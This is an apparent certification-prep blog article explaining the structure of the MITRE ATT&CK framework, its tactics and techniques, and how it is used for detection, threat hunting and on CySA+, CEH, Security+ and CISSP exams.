Understanding MITRE ATT&CK Framework for Certification Exams
A comprehensive guide to the MITRE ATT&CK framework, covering its structure, how to use it, and how it appears on CEH, CySA+, Security+, and CISSP certification exams.
What Is MITRE ATT&CK?
MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. Developed and maintained by MITRE Corporation, the framework organizes how attackers actually behave after gaining initial access to a target environment — not just theoretical attack theory, but documented behavior observed in actual intrusions.
ATT&CK is not a framework for building security controls (that is NIST CSF). It is a framework for understanding and categorizing attacker behavior so that defenders can detect, analyze, and respond to it more effectively. This makes it invaluable for threat intelligence, detection engineering, threat hunting, red team planning, and incident response.
For certification candidates, MITRE ATT&CK is tested heavily on CySA+ (CS0-003), appears in CEH v13's threat analysis modules, and is referenced in CISSP's security operations and assessment domains. If you are preparing for any defensive security certification, fluency in ATT&CK is essential.
Framework Structure
ATT&CK is organized into three primary matrices:
Enterprise ATT&CK: Covers adversary behavior against enterprise IT environments — Windows, macOS, Linux, cloud (AWS, Azure, GCP), SaaS, and network infrastructure. The most commonly referenced matrix for certification purposes.
Mobile ATT&CK: Covers adversary behavior targeting iOS and Android mobile devices.
ICS ATT&CK: Covers adversary behavior targeting Industrial Control Systems and operational technology (OT) environments.
Within each matrix, behavior is organized into Tactics, Techniques, and Sub-techniques.
Tactics
Tactics represent the adversary's tactical goal — the reason they are performing an action. ATT&CK for Enterprise defines 14 tactics:
Reconnaissance: Gathering information before attacking the target. Includes active scanning, phishing for information, and searching open technical databases.
Resource Development: Establishing infrastructure for the attack. Acquiring accounts, building malware, setting up staging servers.
Initial Access: The technique used to first gain a foothold in the target environment. Phishing, exploiting public-facing applications, supply chain compromise.
Execution: Running malicious code. Command and scripting interpreters, user-triggered execution, scheduled tasks.
Persistence: Maintaining access across system restarts, credential changes, and other interruptions. Registry modifications, scheduled tasks, boot process manipulation.
Privilege Escalation: Gaining higher-level permissions. Exploiting vulnerabilities, abusing sudo configurations, Token impersonation.
Defense Evasion: Avoiding detection. Obfuscation, disabling security tools, masquerading, living off the land techniques.
Credential Access: Stealing usernames and passwords. Keylogging, credential dumping (LSASS), Kerberoasting, brute force.
Discovery: Learning about the internal environment after initial access. Network scanning, account enumeration, process discovery.
Lateral Movement: Moving through the environment to reach target systems. Pass-the-hash, remote services, internal spearphishing.
Collection: Gathering data of interest to the attacker's objective. Screen capture, keylogging, data from network shares.
Command and Control: Communicating with compromised systems. Application layer protocols, encrypted channels, domain generation algorithms.
Exfiltration: Stealing data. Over command and control channels, via alternative protocols, physically.
Impact: Disrupting availability or integrity. Ransomware (data encrypted for impact), disk wipe, defacement.
Techniques and Sub-techniques
Under each tactic are specific techniques — the concrete methods used to achieve the tactic's goal. For example, under the Credential Access tactic, technique T1003 covers OS Credential Dumping, with sub-techniques covering LSASS Memory, NTDS, and SAM database access specifically.
ATT&CK for Enterprise currently documents over 600 unique techniques and sub-techniques. You do not need to memorize all of them for certification exams, but you need to understand the structure and be able to apply it to scenario questions.
Practical Application: Detection Use Cases
ATT&CK's practical value comes from mapping detections to specific techniques. For each technique, ATT&CK provides:
For example, for T1078 (Valid Accounts — using stolen credentials), ATT&CK suggests detecting anomalous account behavior through SIEM rules, correlating logins from unusual geographic locations or times, and monitoring for credential stuffing patterns. Mitigations include MFA, privileged access management, and account monitoring.
This is exactly the kind of scenario-based reasoning that CySA+ exams test. Given an observed behavior, identify the ATT&CK technique, and select the appropriate detection or mitigation response.
ATT&CK and the Cyber Kill Chain
ATT&CK and the Lockheed Martin Cyber Kill Chain are related but distinct frameworks. The Kill Chain describes the high-level phases of an attack from the attacker's perspective (Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command and Control, Actions on Objectives). ATT&CK provides granular technique-level detail within and across those phases.
On certification exams, questions sometimes test your ability to map between these frameworks. Know that ATT&CK is more granular and operationally useful for detection, while the Kill Chain is better for understanding the overall attack lifecycle.
ATT&CK and the Diamond Model
The Diamond Model of Intrusion Analysis is a third complementary framework that structures incident analysis around four features: Adversary, Infrastructure, Capability, and Victim. ATT&CK techniques describe the Capability dimension. The Diamond Model helps analysts relate different observations of an incident to each other and to the threat actor.
CySA+ tests all three frameworks and expects you to understand how they complement each other in a comprehensive threat analysis program.
Threat Intelligence Applications
ATT&CK is the standard vocabulary for threat intelligence sharing. When a threat intelligence report describes a threat actor, it typically maps the actor's techniques to ATT&CK IDs. This allows security teams to:
ATT&CK Navigator is a free web tool that allows you to visualize which techniques your detection rules cover, identify gaps, and plan remediation priorities. It is an essential tool for security operations teams and is referenced in CySA+ study materials.
Threat Hunting With ATT&CK
Threat hunting involves proactively searching for adversary activity that has not yet triggered automated alerts. ATT&CK provides the hypothesis framework for threat hunts:
1. Select a technique or set of techniques relevant to your threat model
2. Identify the data sources needed to detect that technique (process logs, network flows, endpoint telemetry)
3. Define the expected attacker behavior pattern
4. Search your environment for evidence of that pattern
5. Document findings and either escalate as an incident or tune detection rules
This structured hypothesis-driven approach, grounded in ATT&CK, is what CySA+ exam questions about threat hunting are testing.
Exam Relevance by Certification
CySA+ (CS0-003): ATT&CK is one of the most heavily tested topics. Expect questions requiring you to identify the tactic or technique for a described behavior, select detection approaches for a given technique, and explain how ATT&CK integrates with threat intelligence programs.
CEH v13: ATT&CK appears in the threat intelligence and attack methodology modules. Know the major tactics and how they relate to the ethical hacker methodology phases.
CISSP (Domain 6 and 7): ATT&CK is referenced in security assessment and testing (Domain 6) and security operations (Domain 7). Understand it as a framework for threat modeling, red team planning, and detection program design.
Security+ SY0-701: ATT&CK appears in the threats and vulnerabilities domain. Know the framework at a high level — tactics, the distinction from the Kill Chain, and how it is used for threat intelligence.
Study Tips for ATT&CK Questions
Visit attack.mitre.org and spend time navigating the Enterprise matrix. Read the descriptions for at least 20-30 high-priority techniques. Understanding the actual content of the framework is more valuable than memorizing IDs.
Practice mapping scenarios to tactics first, then techniques. If a question describes an attacker using stolen credentials to log into a remote workstation, the tactic is Lateral Movement and the technique is likely Remote Services.
Know the data sources for common detection techniques. SIEM, EDR, network flow analysis, and Windows Event Logs are the most common data sources referenced in both ATT&CK and certification exam questions.
Understand that ATT&CK is descriptive, not prescriptive. It documents what attackers do, not what defenders must do. This framing matters for management-level exam questions.
CyberCertPrep includes MITRE ATT&CK scenario questions in our CySA+, CEH, and Security+ practice question banks. Work through these to develop the pattern recognition needed for exam success.
Sources & References
Michael Torres
CISA, CRISC, ISO 27001 Lead Auditor
Michael is a GRC consultant specializing in compliance frameworks and risk management. He has conducted 50+ ISO 27001 audits and writes about governance, risk, and certification preparation.
Ready to start practicing?
50+ certifications. 99,000+ questions. 20 free per cert.